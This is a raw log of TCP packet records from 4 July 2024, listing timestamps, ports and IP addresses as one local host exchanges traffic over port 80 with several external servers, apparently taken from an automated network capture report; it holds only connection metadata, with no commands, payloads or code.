Jul 4, 2024 03:12:30.905782938 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.905828953 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.905838966 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.905857086 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.905905962 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.906018019 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.906028986 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.906038046 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.906049013 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.906073093 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.906100988 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.906541109 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.906553030 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.906562090 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.906572104 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.906580925 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.906608105 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.906625032 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.907104969 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.907114983 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.907125950 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.907135963 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.907146931 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.907156944 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.907164097 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.907170057 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.907183886 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.907183886 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.907263994 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.908200979 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.908212900 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.908221960 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.908232927 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.908241987 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.908252954 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.908261061 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.908265114 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.908277988 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.908282042 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.908282042 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.908288002 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.908312082 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.908360958 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.909136057 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.909162045 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.909172058 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.909177065 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.909184933 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.909195900 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.909200907 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.909210920 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.909238100 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.909290075 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.909915924 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.909925938 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
                  Jul 4, 2024 03:12:30.909935951 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.909945965 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.909954071 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.909964085 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.909969091 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.909985065 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.910012960 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.910012960 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.910563946 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.910574913 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.910584927 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.910594940 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.910604954 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.910613060 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.910618067 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.910645008 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.910698891 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.911271095 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.911278963 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.911288023 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.911298037 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.911307096 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.911317110 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.911328077 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.911329985 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.911339045 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.911339998 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.911350012 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.911365986 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.911401987 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.911401987 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.912224054 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.912234068 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.912244081 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.912254095 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.912265062 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.912270069 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.912275076 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.912286997 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.912301064 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.912301064 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.912373066 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.913167000 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913177967 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913187981 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913197994 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913207054 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913217068 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913223982 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.913228035 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913244963 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913244963 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.913256884 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913269997 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.913279057 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.913328886 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.913872957 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913882971 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913892984 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913902998 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913912058 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.913924932 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.913954020 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.955018044 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.955183029 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.955192089 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.955214977 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.955240011 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.955251932 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.955261946 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.955266953 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.955272913 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.955290079 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.955382109 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.955615044 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.958369970 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.986557961 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.986640930 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.986649036 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.986680031 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.986756086 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.986793041 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.986803055 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.986813068 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.986823082 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.986859083 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.986912966 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.987159967 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.987245083 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.987274885 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.987376928 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.987386942 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.987396955 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.987406015 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.987461090 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.987461090 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.987795115 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.987806082 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.987814903 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.987865925 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.987865925 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.988027096 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.988037109 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.988046885 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.988058090 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.988080978 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.988112926 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:35.583679914 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:35.583731890 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:35.799458027 CEST4975880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:35.804267883 CEST8049758116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:35.804342985 CEST4975880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:35.806169987 CEST4975880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:35.811024904 CEST8049758116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:37.310384989 CEST4975880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:37.357083082 CEST8049758116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:38.567480087 CEST4976180192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:38.572350979 CEST8049761116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:38.572446108 CEST4976180192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:38.577179909 CEST4976180192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:38.582437038 CEST8049761116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:40.091475010 CEST4976180192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:40.136980057 CEST8049761116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:41.114554882 CEST4976280192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:41.119409084 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:41.119553089 CEST4976280192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:41.121562004 CEST4976280192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:41.126358986 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:41.126375914 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:41.126384020 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:41.126425028 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:41.126434088 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:41.126545906 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:41.126554966 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:41.126589060 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:41.126596928 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:42.626216888 CEST4976280192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:42.673223019 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:43.650998116 CEST4976380192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:43.656321049 CEST8049763116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:43.656377077 CEST4976380192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:43.659425020 CEST4976380192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:43.665882111 CEST8049763116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:57.192284107 CEST8049758116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:57.192462921 CEST4975880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:59.954165936 CEST8049761116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:59.955801010 CEST4976180192.168.2.4116.213.43.190
                  Jul 4, 2024 03:13:02.538129091 CEST8049762116.213.43.190192.168.2.4
                  Jul 4, 2024 03:13:02.539813995 CEST4976280192.168.2.4116.213.43.190
                  Jul 4, 2024 03:13:05.032463074 CEST8049763116.213.43.190192.168.2.4
                  Jul 4, 2024 03:13:05.035888910 CEST4976380192.168.2.4116.213.43.190
                  Jul 4, 2024 03:13:05.036636114 CEST4976380192.168.2.4116.213.43.190
                  Jul 4, 2024 03:13:05.041543007 CEST8049763116.213.43.190192.168.2.4
                  Jul 4, 2024 03:13:10.063812017 CEST4976480192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:10.068645954 CEST804976413.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:10.071903944 CEST4976480192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:10.075815916 CEST4976480192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:10.080667973 CEST804976413.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:10.768528938 CEST804976413.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:10.768634081 CEST4976480192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:11.575927019 CEST4976480192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:11.580708027 CEST804976413.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:12.595690966 CEST4976580192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:12.600536108 CEST804976513.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:12.600614071 CEST4976580192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:12.602462053 CEST4976580192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:12.607220888 CEST804976513.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:13.077112913 CEST804976513.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:13.077172995 CEST4976580192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:14.109280109 CEST4976580192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:14.114128113 CEST804976513.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.125169039 CEST4976680192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:15.129961967 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.130188942 CEST4976680192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:15.132055044 CEST4976680192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:15.136878014 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.136888027 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.136924028 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.136931896 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.137012005 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.137020111 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.137047052 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.137051105 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.137056112 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.612634897 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:15.612684011 CEST4976680192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:16.638443947 CEST4976680192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:16.643435001 CEST804976613.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:17.657830954 CEST4976780192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:17.662657976 CEST804976713.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:17.662718058 CEST4976780192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:17.664186954 CEST4976780192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:17.669121027 CEST804976713.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:18.146694899 CEST804976713.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:18.146794081 CEST804976713.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:18.146867037 CEST4976780192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:18.148919106 CEST4976780192.168.2.413.248.169.48
                  Jul 4, 2024 03:13:18.153954983 CEST804976713.248.169.48192.168.2.4
                  Jul 4, 2024 03:13:23.266544104 CEST4976880192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:23.271393061 CEST804976838.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:23.277816057 CEST4976880192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:23.294795990 CEST4976880192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:23.299664974 CEST804976838.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:24.179734945 CEST804976838.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:24.179882050 CEST804976838.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:24.179928064 CEST4976880192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:24.810476065 CEST4976880192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:25.831506014 CEST4976980192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:25.836369991 CEST804976938.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:25.836437941 CEST4976980192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:25.838396072 CEST4976980192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:25.843132019 CEST804976938.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:26.743859053 CEST804976938.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:26.743976116 CEST804976938.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:26.744026899 CEST4976980192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:27.341552973 CEST4976980192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:28.359945059 CEST4977080192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:28.365020990 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:28.365101099 CEST4977080192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:28.367280006 CEST4977080192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:28.372226954 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:28.372246981 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:28.372299910 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:28.372332096 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:28.372374058 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:28.372436047 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:28.372493982 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:28.372510910 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:28.372596979 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:29.258243084 CEST4977180192.168.2.4162.241.253.174
                  Jul 4, 2024 03:13:29.263087034 CEST8049771162.241.253.174192.168.2.4
                  Jul 4, 2024 03:13:29.263151884 CEST4977180192.168.2.4162.241.253.174
                  Jul 4, 2024 03:13:29.265779018 CEST4977180192.168.2.4162.241.253.174
                  Jul 4, 2024 03:13:29.270567894 CEST8049771162.241.253.174192.168.2.4
                  Jul 4, 2024 03:13:29.279330015 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:29.285845041 CEST804977038.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:29.285893917 CEST4977080192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:29.872946024 CEST4977080192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:30.462892056 CEST8049771162.241.253.174192.168.2.4
                  Jul 4, 2024 03:13:30.635905027 CEST4977180192.168.2.4162.241.253.174
                  Jul 4, 2024 03:13:30.891272068 CEST4977280192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:30.896075010 CEST804977238.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:30.896172047 CEST4977280192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:30.898164034 CEST4977280192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:30.902962923 CEST804977238.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:31.825758934 CEST804977238.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:31.825809002 CEST804977238.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:31.825911045 CEST4977280192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:31.828881979 CEST4977280192.168.2.438.47.232.224
                  Jul 4, 2024 03:13:31.833635092 CEST804977238.47.232.224192.168.2.4
                  Jul 4, 2024 03:13:35.509339094 CEST8049771162.241.253.174192.168.2.4
                  Jul 4, 2024 03:13:35.509455919 CEST4977180192.168.2.4162.241.253.174
                  Jul 4, 2024 03:13:35.511080980 CEST4977180192.168.2.4162.241.253.174
                  Jul 4, 2024 03:13:35.515835047 CEST8049771162.241.253.174192.168.2.4
                  Jul 4, 2024 03:13:45.168802977 CEST4977380192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:45.173656940 CEST804977335.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:45.173746109 CEST4977380192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:45.175297022 CEST4977380192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:45.180079937 CEST804977335.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:45.841424942 CEST804977335.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:45.844921112 CEST804977335.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:45.844964981 CEST4977380192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:45.845032930 CEST804977335.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:45.845081091 CEST4977380192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:46.002758980 CEST4977480192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:46.018539906 CEST8049774202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:46.018610001 CEST4977480192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:46.020454884 CEST4977480192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:46.025309086 CEST8049774202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:46.707959890 CEST4977380192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:46.965007067 CEST8049774202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:46.965198994 CEST8049774202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:46.965285063 CEST4977480192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:47.529113054 CEST4977480192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:47.719387054 CEST4977580192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:47.724184990 CEST804977535.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:47.724247932 CEST4977580192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:47.726028919 CEST4977580192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:47.730742931 CEST804977535.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:48.393785954 CEST804977535.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:48.397483110 CEST804977535.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:48.397578955 CEST4977580192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:48.397949934 CEST804977535.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:48.398097992 CEST4977580192.168.2.435.190.52.58
